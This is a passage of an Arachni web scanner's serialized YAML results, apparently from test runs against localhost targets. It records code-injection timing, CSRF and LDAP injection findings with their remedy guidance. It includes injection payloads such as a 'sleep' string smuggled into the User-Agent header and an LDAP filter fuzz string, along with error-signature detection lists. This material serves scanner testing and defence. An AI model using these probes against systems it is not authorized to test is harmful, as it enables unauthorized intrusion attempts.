case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:14309/ruby/header/straight
elem: header
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' && sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' && sleep(16000/1000);'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ! ' && sleep(16000/1000);'
:injected: ! ' && sleep(16000/1000);'
:combo:
User-Agent: ! ' && sleep(16000/1000);'
:action: http://localhost:14309/ruby/header/straight
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:14309/ruby/header/straight
injected: ! ' && sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ! ' && sleep(16000/1000);'
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CGI Security: http://www.cgisecurity.com/csrf-faq.html
var: insecure_important_form
url: http://localhost:9097/
elem: form
method: GET
name: Cross-Site Request Forgery
description: ! "The web application does not, or can not,\n sufficiently verify
whether a well-formed, valid, consistent\n request was intentionally provided
by the user who submitted the request.\n This is due to a lack of secure anti-CSRF
tokens to verify\n the freshness of the submitted data."
tags:
- csrf
- rdiff
- form
- token
cwe: '352'
cwe_url: http://cwe.mitre.org/data/definitions/352.html
severity: High
remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data
must be added to all web application elements that can affect\n business logic."
mod_name: CSRF
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CGI Security: http://www.cgisecurity.com/csrf-faq.html
opts:
:var: !binary |-
aW5zZWN1cmVfaW1wb3J0YW50X2Zvcm0=
:elem: form
:regexp: ''
var: insecure_important_form
url: http://localhost:9097/
injected:
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: GET
response: ! "
\n \n\n
\ \n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: logged_in=true
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NDYz
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Cross-Site Request Forgery
description: ! "The web application does not, or can not,\n sufficiently verify
whether a well-formed, valid, consistent\n request was intentionally provided
by the user who submitted the request.\n This is due to a lack of secure
anti-CSRF tokens to verify\n the freshness of the submitted data."
tags:
- csrf
- rdiff
- form
- token
cwe: '352'
cwe_url: http://cwe.mitre.org/data/definitions/352.html
severity: High
remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data
must be added to all web application elements that can affect\n business
logic."
mod_name: CSRF
variations: []
internal_modname: CSRF
internal_modname: CSRF
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CGI Security: http://www.cgisecurity.com/csrf-faq.html
var: insecure_important_form
url: http://localhost:9097/token_in_name
elem: form
method: GET
name: Cross-Site Request Forgery
description: ! "The web application does not, or can not,\n sufficiently verify
whether a well-formed, valid, consistent\n request was intentionally provided
by the user who submitted the request.\n This is due to a lack of secure anti-CSRF
tokens to verify\n the freshness of the submitted data."
tags:
- csrf
- rdiff
- form
- token
cwe: '352'
cwe_url: http://cwe.mitre.org/data/definitions/352.html
severity: High
remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data
must be added to all web application elements that can affect\n business logic."
mod_name: CSRF
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CGI Security: http://www.cgisecurity.com/csrf-faq.html
opts:
:var: !binary |-
aW5zZWN1cmVfaW1wb3J0YW50X2Zvcm0=
:elem: form
:regexp: ''
var: insecure_important_form
url: http://localhost:9097/token_in_name
injected:
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: GET
response: ! " \n \n\n
\ \n\n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: logged_in=true
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NDQy
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Cross-Site Request Forgery
description: ! "The web application does not, or can not,\n sufficiently verify
whether a well-formed, valid, consistent\n request was intentionally provided
by the user who submitted the request.\n This is due to a lack of secure
anti-CSRF tokens to verify\n the freshness of the submitted data."
tags:
- csrf
- rdiff
- form
- token
cwe: '352'
cwe_url: http://cwe.mitre.org/data/definitions/352.html
severity: High
remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data
must be added to all web application elements that can affect\n business
logic."
mod_name: CSRF
variations: []
internal_modname: CSRF
internal_modname: CSRF
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CGI Security: http://www.cgisecurity.com/csrf-faq.html
var: insecure_important_form
url: http://localhost:9097/token_in_action
elem: form
method: GET
name: Cross-Site Request Forgery
description: ! "The web application does not, or can not,\n sufficiently verify
whether a well-formed, valid, consistent\n request was intentionally provided
by the user who submitted the request.\n This is due to a lack of secure anti-CSRF
tokens to verify\n the freshness of the submitted data."
tags:
- csrf
- rdiff
- form
- token
cwe: '352'
cwe_url: http://cwe.mitre.org/data/definitions/352.html
severity: High
remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data
must be added to all web application elements that can affect\n business logic."
mod_name: CSRF
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CGI Security: http://www.cgisecurity.com/csrf-faq.html
opts:
:var: !binary |-
aW5zZWN1cmVfaW1wb3J0YW50X2Zvcm0=
:elem: form
:regexp: ''
var: insecure_important_form
url: http://localhost:9097/token_in_action
injected:
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: GET
response: ! " \n \n\n
\ \n\n
\ \n\n
\ \n\n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: logged_in=true
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzY2
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Cross-Site Request Forgery
description: ! "The web application does not, or can not,\n sufficiently verify
whether a well-formed, valid, consistent\n request was intentionally provided
by the user who submitted the request.\n This is due to a lack of secure
anti-CSRF tokens to verify\n the freshness of the submitted data."
tags:
- csrf
- rdiff
- form
- token
cwe: '352'
cwe_url: http://cwe.mitre.org/data/definitions/352.html
severity: High
remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data
must be added to all web application elements that can affect\n business
logic."
mod_name: CSRF
variations: []
internal_modname: CSRF
internal_modname: CSRF
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CGI Security: http://www.cgisecurity.com/csrf-faq.html
var: insecure_important_form
url: http://localhost:9097/with_nonce
elem: form
method: GET
name: Cross-Site Request Forgery
description: ! "The web application does not, or can not,\n sufficiently verify
whether a well-formed, valid, consistent\n request was intentionally provided
by the user who submitted the request.\n This is due to a lack of secure anti-CSRF
tokens to verify\n the freshness of the submitted data."
tags:
- csrf
- rdiff
- form
- token
cwe: '352'
cwe_url: http://cwe.mitre.org/data/definitions/352.html
severity: High
remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data
must be added to all web application elements that can affect\n business logic."
mod_name: CSRF
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CGI Security: http://www.cgisecurity.com/csrf-faq.html
opts:
:var: !binary |-
aW5zZWN1cmVfaW1wb3J0YW50X2Zvcm0=
:elem: form
:regexp: ''
var: insecure_important_form
url: http://localhost:9097/with_nonce
injected:
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: GET
response: ! " \n \n\n
\ \n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: logged_in=true
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NDIx
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowNSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Cross-Site Request Forgery
description: ! "The web application does not, or can not,\n sufficiently verify
whether a well-formed, valid, consistent\n request was intentionally provided
by the user who submitted the request.\n This is due to a lack of secure
anti-CSRF tokens to verify\n the freshness of the submitted data."
tags:
- csrf
- rdiff
- form
- token
cwe: '352'
cwe_url: http://cwe.mitre.org/data/definitions/352.html
severity: High
remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data
must be added to all web application elements that can affect\n business
logic."
mod_name: CSRF
variations: []
internal_modname: CSRF
internal_modname: CSRF
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
OWASP: http://www.owasp.org/index.php/LDAP_injection
var: input
url: http://localhost:13347/form/append
elem: form
method: GET
name: LDAP Injection
description: ! "LDAP queries can be injected into the web application\n which
can be used to disclose sensitive data of affect the execution flow."
tags:
- ldap
- injection
- regexp
cwe: '90'
cwe_url: http://cwe.mitre.org/data/definitions/90.html
severity: High
cvssv2: ''
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used in an LDAP query."
remedy_code: ''
mod_name: LDAPInjection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
OWASP: http://www.owasp.org/index.php/LDAP_injection
opts:
:redundant: false
:async: true
:regexp: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
:match: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
:substring:
- !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
- !binary |-
amF2YXgubmFtaW5nLk5hbWVOb3RGb3VuZEV4Y2VwdGlvbg==
- !binary |-
TERBUEV4Y2VwdGlvbg==
- !binary |-
Y29tLnN1bi5qbmRpLmxkYXA=
- !binary |-
U2VhcmNoOiBCYWQgc2VhcmNoIGZpbHRlcg==
- !binary |-
UHJvdG9jb2wgZXJyb3Igb2NjdXJyZWQ=
- !binary |-
U2l6ZSBsaW1pdCBoYXMgZXhjZWVkZWQ=
- !binary |-
QW4gaW5hcHByb3ByaWF0ZSBtYXRjaGluZyBvY2N1cnJlZA==
- !binary |-
QSBjb25zdHJhaW50IHZpb2xhdGlvbiBvY2N1cnJlZA==
- !binary |-
VGhlIHN5bnRheCBpcyBpbnZhbGlk
- !binary |-
T2JqZWN0IGRvZXMgbm90IGV4aXN0
- !binary |-
VGhlIGFsaWFzIGlzIGludmFsaWQ=
- !binary |-
VGhlIGRpc3Rpbmd1aXNoZWQgbmFtZSBoYXMgYW4gaW52YWxpZCBzeW50YXg=
- !binary |-
VGhlIHNlcnZlciBkb2VzIG5vdCBoYW5kbGUgZGlyZWN0b3J5IHJlcXVlc3Rz
- !binary |-
VGhlcmUgd2FzIGEgbmFtaW5nIHZpb2xhdGlvbg==
- !binary |-
VGhlcmUgd2FzIGFuIG9iamVjdCBjbGFzcyB2aW9sYXRpb24=
- !binary |-
UmVzdWx0cyByZXR1cm5lZCBhcmUgdG9vIGxhcmdl
- !binary |-
VW5rbm93biBlcnJvciBvY2N1cnJlZA==
- !binary |-
TG9jYWwgZXJyb3Igb2NjdXJyZWQ=
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW5jb3JyZWN0
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW52YWxpZA==
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgY2Fubm90IGJlIHJlY29nbml6ZWQ=
- !binary |-
SW52YWxpZCBETiBzeW50YXg=
- !binary |-
Tm8gU3VjaCBPYmplY3Q=
- !binary |-
SVBXb3Jrc0FTUC5MREFQ
- !binary |-
TW9kdWxlIFByb2R1Y3RzLkxEQVBNdWx0aVBsdWdpbnM=
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '#^($!@$)(()))******'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default#^($!@$)(()))******
:follow_location: true
:injected: default#^($!@$)(()))******
:combo:
!binary "aW5wdXQ=": default#^($!@$)(()))******
:action: http://localhost:13347/form/append
:verification: false
:id: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
var: input
url: http://localhost:13347/form/append
injected: default#^($!@$)(()))******
id: supplied argument is not a valid ldap
regexp: supplied argument is not a valid ldap
regexp_match: supplied argument is not a valid ldap
elem: form
remarks: {}
method: GET
response: ! 'supplied argument is not a valid ldap
javax.naming.NameNotFoundException
LDAPException
com.sun.jndi.ldap
Search: Bad search filter
Protocol error occurred
Size limit has exceeded
An inappropriate matching occurred
A constraint violation occurred
The syntax is invalid
Object does not exist
The alias is invalid
The distinguished name has an invalid syntax
The server does not handle directory requests
There was a naming violation
There was an object class violation
Results returned are too large
Unknown error occurred
Local error occurred
The search filter is incorrect
The search filter is invalid
The search filter cannot be recognized
Invalid DN syntax
No Such Object
IPWorksASP.LDAP
Module Products.LDAPMultiPlugins
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzIz
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: LDAP Injection
description: ! "LDAP queries can be injected into the web application\n which
can be used to disclose sensitive data of affect the execution flow."
tags:
- ldap
- injection
- regexp
cwe: '90'
cwe_url: http://cwe.mitre.org/data/definitions/90.html
severity: High
cvssv2: ''
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used in an LDAP query."
remedy_code: ''
mod_name: LDAPInjection
variations: []
internal_modname: LDAPInjection
internal_modname: LDAPInjection
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
OWASP: http://www.owasp.org/index.php/LDAP_injection
var: input
url: http://localhost:13347/link/append?input=default
elem: link
method: GET
name: LDAP Injection
description: ! "LDAP queries can be injected into the web application\n which
can be used to disclose sensitive data of affect the execution flow."
tags:
- ldap
- injection
- regexp
cwe: '90'
cwe_url: http://cwe.mitre.org/data/definitions/90.html
severity: High
cvssv2: ''
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used in an LDAP query."
remedy_code: ''
mod_name: LDAPInjection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
OWASP: http://www.owasp.org/index.php/LDAP_injection
opts:
:redundant: false
:async: true
:regexp: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
:match: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
:substring:
- !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
- !binary |-
amF2YXgubmFtaW5nLk5hbWVOb3RGb3VuZEV4Y2VwdGlvbg==
- !binary |-
TERBUEV4Y2VwdGlvbg==
- !binary |-
Y29tLnN1bi5qbmRpLmxkYXA=
- !binary |-
U2VhcmNoOiBCYWQgc2VhcmNoIGZpbHRlcg==
- !binary |-
UHJvdG9jb2wgZXJyb3Igb2NjdXJyZWQ=
- !binary |-
U2l6ZSBsaW1pdCBoYXMgZXhjZWVkZWQ=
- !binary |-
QW4gaW5hcHByb3ByaWF0ZSBtYXRjaGluZyBvY2N1cnJlZA==
- !binary |-
QSBjb25zdHJhaW50IHZpb2xhdGlvbiBvY2N1cnJlZA==
- !binary |-
VGhlIHN5bnRheCBpcyBpbnZhbGlk
- !binary |-
T2JqZWN0IGRvZXMgbm90IGV4aXN0
- !binary |-
VGhlIGFsaWFzIGlzIGludmFsaWQ=
- !binary |-
VGhlIGRpc3Rpbmd1aXNoZWQgbmFtZSBoYXMgYW4gaW52YWxpZCBzeW50YXg=
- !binary |-
VGhlIHNlcnZlciBkb2VzIG5vdCBoYW5kbGUgZGlyZWN0b3J5IHJlcXVlc3Rz
- !binary |-
VGhlcmUgd2FzIGEgbmFtaW5nIHZpb2xhdGlvbg==
- !binary |-
VGhlcmUgd2FzIGFuIG9iamVjdCBjbGFzcyB2aW9sYXRpb24=
- !binary |-
UmVzdWx0cyByZXR1cm5lZCBhcmUgdG9vIGxhcmdl
- !binary |-
VW5rbm93biBlcnJvciBvY2N1cnJlZA==
- !binary |-
TG9jYWwgZXJyb3Igb2NjdXJyZWQ=
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW5jb3JyZWN0
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW52YWxpZA==
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgY2Fubm90IGJlIHJlY29nbml6ZWQ=
- !binary |-
SW52YWxpZCBETiBzeW50YXg=
- !binary |-
Tm8gU3VjaCBPYmplY3Q=
- !binary |-
SVBXb3Jrc0FTUC5MREFQ
- !binary |-
TW9kdWxlIFByb2R1Y3RzLkxEQVBNdWx0aVBsdWdpbnM=
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '#^($!@$)(()))******'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default#^($!@$)(()))******
:follow_location: true
:injected: default#^($!@$)(()))******
:combo:
!binary "aW5wdXQ=": default#^($!@$)(()))******
:action: http://localhost:13347/link/append?input=default
:verification: false
:id: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
var: input
url: http://localhost:13347/link/append?input=default
injected: default#^($!@$)(()))******
id: supplied argument is not a valid ldap
regexp: supplied argument is not a valid ldap
regexp_match: supplied argument is not a valid ldap
elem: link
remarks: {}
method: GET
response: ! 'supplied argument is not a valid ldap
javax.naming.NameNotFoundException
LDAPException
com.sun.jndi.ldap
Search: Bad search filter
Protocol error occurred
Size limit has exceeded
An inappropriate matching occurred
A constraint violation occurred
The syntax is invalid
Object does not exist
The alias is invalid
The distinguished name has an invalid syntax
The server does not handle directory requests
There was a naming violation
There was an object class violation
Results returned are too large
Unknown error occurred
Local error occurred
The search filter is incorrect
The search filter is invalid
The search filter cannot be recognized
Invalid DN syntax
No Such Object
IPWorksASP.LDAP
Module Products.LDAPMultiPlugins
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzIz
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: LDAP Injection
description: ! "LDAP queries can be injected into the web application\n which
can be used to disclose sensitive data of affect the execution flow."
tags:
- ldap
- injection
- regexp
cwe: '90'
cwe_url: http://cwe.mitre.org/data/definitions/90.html
severity: High
cvssv2: ''
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used in an LDAP query."
remedy_code: ''
mod_name: LDAPInjection
variations: []
internal_modname: LDAPInjection
internal_modname: LDAPInjection
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
OWASP: http://www.owasp.org/index.php/LDAP_injection
var: cookie2
url: http://localhost:13347/cookie/append
elem: cookie
method: GET
name: LDAP Injection
description: ! "LDAP queries can be injected into the web application\n which
can be used to disclose sensitive data of affect the execution flow."
tags:
- ldap
- injection
- regexp
cwe: '90'
cwe_url: http://cwe.mitre.org/data/definitions/90.html
severity: High
cvssv2: ''
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used in an LDAP query."
remedy_code: ''
mod_name: LDAPInjection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
OWASP: http://www.owasp.org/index.php/LDAP_injection
opts:
:redundant: false
:async: true
:regexp: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
:match: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
:substring:
- !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
- !binary |-
amF2YXgubmFtaW5nLk5hbWVOb3RGb3VuZEV4Y2VwdGlvbg==
- !binary |-
TERBUEV4Y2VwdGlvbg==
- !binary |-
Y29tLnN1bi5qbmRpLmxkYXA=
- !binary |-
U2VhcmNoOiBCYWQgc2VhcmNoIGZpbHRlcg==
- !binary |-
UHJvdG9jb2wgZXJyb3Igb2NjdXJyZWQ=
- !binary |-
U2l6ZSBsaW1pdCBoYXMgZXhjZWVkZWQ=
- !binary |-
QW4gaW5hcHByb3ByaWF0ZSBtYXRjaGluZyBvY2N1cnJlZA==
- !binary |-
QSBjb25zdHJhaW50IHZpb2xhdGlvbiBvY2N1cnJlZA==
- !binary |-
VGhlIHN5bnRheCBpcyBpbnZhbGlk
- !binary |-
T2JqZWN0IGRvZXMgbm90IGV4aXN0
- !binary |-
VGhlIGFsaWFzIGlzIGludmFsaWQ=
- !binary |-
VGhlIGRpc3Rpbmd1aXNoZWQgbmFtZSBoYXMgYW4gaW52YWxpZCBzeW50YXg=
- !binary |-
VGhlIHNlcnZlciBkb2VzIG5vdCBoYW5kbGUgZGlyZWN0b3J5IHJlcXVlc3Rz
- !binary |-
VGhlcmUgd2FzIGEgbmFtaW5nIHZpb2xhdGlvbg==
- !binary |-
VGhlcmUgd2FzIGFuIG9iamVjdCBjbGFzcyB2aW9sYXRpb24=
- !binary |-
UmVzdWx0cyByZXR1cm5lZCBhcmUgdG9vIGxhcmdl
- !binary |-
VW5rbm93biBlcnJvciBvY2N1cnJlZA==
- !binary |-
TG9jYWwgZXJyb3Igb2NjdXJyZWQ=
- !binary |-
